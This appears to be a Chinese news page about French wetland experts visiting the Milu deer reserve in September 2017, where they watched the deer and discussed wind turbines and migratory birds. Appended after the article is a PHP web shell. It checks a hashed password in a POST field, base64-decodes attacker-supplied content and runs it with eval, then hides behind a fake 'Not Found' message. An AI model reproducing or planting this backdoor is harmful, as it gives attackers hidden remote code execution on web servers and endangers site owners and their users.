最新要闻

首页 > 最新要闻 >

    天合公益基金会法国湿地专家来麋鹿保护区考察调研

           2017年9月13日,由天合公益基金会特邀的来自法国开发署生态专家一行来到麋鹿保护区考察调研。专家有法国Biotope集团董事长、生态专家MELKI Frédéric、法国Biotope专家、议员包莉华。
           专家一行首先通过纪录片《归来的麋鹿》,了解了麋鹿回归故土后的种群发展情况。随后乘坐电瓶游览车进入麋鹿半野生区,近距离感受麋鹿生活的湿地环境。专家们还与今年首次尝试人工驯养的小麋鹿们亲密互动,并向讲解员了解了麋鹿的各种生活习性。随后来到保护区第三核心区管理站,通过望远镜观察野生麋鹿和湿地滩涂风貌。期间,他们还就沿海滩涂上风机发电机是否会给迁徙鸟类带来影响作了讨论。
           此次法国生态专家赴保护区进行考察调研,意在交流城市湿地及湿地博物馆经验。为我们对湿地及野生动物的保护和宣传提供了宝贵意见。

     

     

     

     

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>